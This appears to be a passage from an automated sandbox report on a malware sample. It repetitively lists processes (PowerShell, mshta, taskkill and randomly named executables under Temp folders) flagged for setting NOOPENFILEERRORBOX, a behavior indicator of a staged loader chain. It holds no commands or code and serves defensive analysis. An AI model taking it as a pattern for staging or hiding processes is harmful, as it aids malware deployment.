Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
